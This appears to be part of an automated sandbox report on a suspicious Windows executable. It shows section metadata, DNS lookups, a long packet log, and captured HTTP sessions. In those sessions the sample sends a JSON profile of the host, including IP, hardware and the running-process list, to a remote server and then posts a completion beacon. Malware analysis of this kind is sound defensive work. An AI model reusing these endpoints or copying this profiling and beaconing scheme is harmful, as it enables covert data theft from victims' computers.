| | 0x74d000 | 0x398000 | 0x200 | d5a968f595dbf17d881e4646af765fe5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| whflkpvn | 0xae5000 | 0x1ba000 | 0x1ba000 | ee64ce26496913dd203454edf9258e5f | False | 0.994563728436086 | data | 7.955966555987466 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| esywlygt | 0xc9f000 | 0x1000 | 0x400 | effb0fcc375b15c296df7f70da236699 | False | 0.7646484375 | data | 6.013886737052914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xca0000 | 0x3000 | 0x2200 | 5005c7c357368296725d78bd623da61b | False | 0.06640625 | DOS executable (COM) | 0.7367757296076987 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0xc9ec74 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |

| DLL | Import |
| kernel32.dll | lstrcpy |
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 09:15:09.371855974 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371891975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371901035 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371912003 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.371915102 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.371953011 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.371969938 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.372028112 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372035980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372044086 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372047901 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.372107983 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376492977 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376554966 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376705885 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376713991 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376745939 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376754999 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376769066 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376796007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376801014 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.376805067 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.376863003 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.419063091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.419253111 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.467052937 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.467178106 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.515033960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.515099049 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.567019939 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.567112923 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.615035057 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.615151882 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.663044930 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.663114071 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.715050936 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.715174913 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.763072968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.763145924 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.794883966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.795135975 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800060034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800070047 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800086975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800095081 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800112009 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800121069 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800179005 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800187111 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800226927 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800235987 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800246000 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800306082 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800313950 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800322056 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800338030 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800347090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800355911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800371885 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800391912 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.800440073 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800601959 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800610065 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800615072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800678968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800769091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800776958 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800816059 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800887108 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800915956 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800925016 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800973892 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.800992966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.801044941 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.801120996 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.801181078 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805088997 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805154085 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805166960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805210114 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805222988 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805269957 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805282116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805320024 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805322886 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805345058 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805427074 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805434942 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805479050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805542946 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805583954 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805643082 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805650949 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805668116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805675030 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805692911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805701017 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805754900 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805763960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805819988 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805829048 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805845022 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805852890 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805942059 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805960894 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806036949 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806063890 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806073904 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806090117 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806092024 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806114912 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806122065 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806160927 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806175947 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806185007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806216955 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806226015 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806236029 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806282043 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806292057 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806319952 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806329966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806401968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806408882 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806448936 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806457043 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806463003 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806468010 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806483030 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806492090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806513071 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806521893 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806550980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806559086 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806605101 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806612968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806657076 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806665897 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806677103 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806684971 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806708097 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806718111 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806744099 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806751966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806776047 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806783915 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806847095 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806854963 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806862116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806869984 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806936979 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806946039 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806948900 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.809899092 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810035944 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810044050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810081959 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810090065 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810137033 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810151100 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810159922 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810894012 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810904980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811068058 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811078072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811103106 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811110020 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811196089 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811203957 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811249018 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811258078 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811268091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811300993 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811357021 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811366081 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811433077 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811443090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811461926 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811470985 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811484098 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.811506987 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811522007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811553001 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.811562061 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811569929 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811604023 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811614990 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811626911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811638117 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811672926 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811681032 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811723948 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811732054 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811738968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811748028 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811773062 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811781883 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811799049 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811808109 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811863899 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811873913 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811889887 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811903000 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811919928 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811928034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811952114 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811959982 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811990023 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811999083 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812022924 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812037945 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812067986 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812076092 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812129974 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812139034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812174082 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816306114 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816411018 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816418886 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816478968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816488028 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816504002 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816513062 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816566944 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816575050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816626072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816634893 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816723108 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816730022 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816736937 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816741943 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.816746950 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816777945 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816787958 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816843033 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816853046 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816905975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816916943 CET804971134.147.147.173192.168.2.6
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Jan 2, 2025 09:15:06.867830992 CET | 192.168.2.6 | 1.1.1.1 | 0x228d | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:06.867892027 CET | 192.168.2.6 | 1.1.1.1 | 0xa97e | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Jan 2, 2025 09:15:08.603240013 CET | 192.168.2.6 | 1.1.1.1 | 0x5b23 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:08.603332996 CET | 192.168.2.6 | 1.1.1.1 | 0x9f6b | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false |
| Jan 2, 2025 09:15:12.518076897 CET | 192.168.2.6 | 1.1.1.1 | 0xebea | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:12.518140078 CET | 192.168.2.6 | 1.1.1.1 | 0x32b3 | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false |
| Jan 2, 2025 09:15:13.478763103 CET | 192.168.2.6 | 1.1.1.1 | 0xb973 | Standard query (0) | home.fortth14vs.top | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:13.478825092 CET | 192.168.2.6 | 1.1.1.1 | 0x332a | Standard query (0) | home.fortth14vs.top | 28 | IN (0x0001) | false |
| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Jan 2, 2025 09:15:06.875184059 CET | 1.1.1.1 | 192.168.2.6 | 0x228d | No error (0) | httpbin.org | | 34.200.57.114 | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:06.875184059 CET | 1.1.1.1 | 192.168.2.6 | 0x228d | No error (0) | httpbin.org | | 34.197.122.172 | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:08.884521961 CET | 1.1.1.1 | 192.168.2.6 | 0x5b23 | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:12.525157928 CET | 1.1.1.1 | 192.168.2.6 | 0xebea | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |
| Jan 2, 2025 09:15:14.144407034 CET | 1.1.1.1 | 192.168.2.6 | 0xb973 | No error (0) | home.fortth14vs.top | | 34.147.147.173 | A (IP address) | IN (0x0001) | false |
                                                  • httpbin.org
                                                  • home.fortth14vs.top
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49711 | 34.147.147.173 | 80 | 5792 | C:\Users\user\Desktop\random(5).exe |

Timestamp: Jan 2, 2025 09:15:09.366978884 CET | Bytes transferred: 12360 | Direction: OUT | Data:
POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 442005
                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001676043", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
Timestamp: Jan 2, 2025 09:15:12.459002018 CET | Bytes transferred: 138 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:12 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 1
                                                  Data Raw: 30
                                                  Data Ascii: 0


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.6 | 49718 | 34.147.147.173 | 80 | 5792 | C:\Users\user\Desktop\random(5).exe |

Timestamp: Jan 2, 2025 09:15:12.811916113 CET | Bytes transferred: 99 | Direction: OUT | Data:
GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
Timestamp: Jan 2, 2025 09:15:13.419538021 CET | Bytes transferred: 353 | Direction: IN | Data:
HTTP/1.1 404 NOT FOUND
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:13 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 207
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.6 | 49730 | 34.147.147.173 | 80 | 5792 | C:\Users\user\Desktop\random(5).exe |

Timestamp: Jan 2, 2025 09:15:14.294465065 CET | Bytes transferred: 172 | Direction: OUT | Data:
POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                  Data Ascii: { "id1": "0", "data": "Done1" }
Timestamp: Jan 2, 2025 09:15:14.996077061 CET | Bytes transferred: 353 | Direction: IN | Data:
HTTP/1.1 404 NOT FOUND
                                                  server: nginx/1.22.1
                                                  date: Thu, 02 Jan 2025 08:15:14 GMT
                                                  content-type: text/html; charset=utf-8
                                                  content-length: 207
                                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.6 | 49710 | 34.200.57.114 | 443 | 5792 | C:\Users\user\Desktop\random(5).exe |

Timestamp: 2025-01-02 08:15:07 UTC | Bytes transferred: 52 | Direction: OUT | Data:
GET /ip HTTP/1.1
                                                  Host: httpbin.org
                                                  Accept: */*
Timestamp: 2025-01-02 08:15:07 UTC | Bytes transferred: 224 | Direction: IN | Data:
HTTP/1.1 200 OK
                                                  Date: Thu, 02 Jan 2025 08:15:07 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 31
                                                  Connection: close
                                                  Server: gunicorn/19.9.0
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Credentials: true
Timestamp: 2025-01-02 08:15:07 UTC | Bytes transferred: 31 | Direction: IN | Data:
Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                  Data Ascii: { "origin": "8.46.123.189"}



                                                  Target ID:0
                                                  Start time:03:15:02
                                                  Start date:02/01/2025
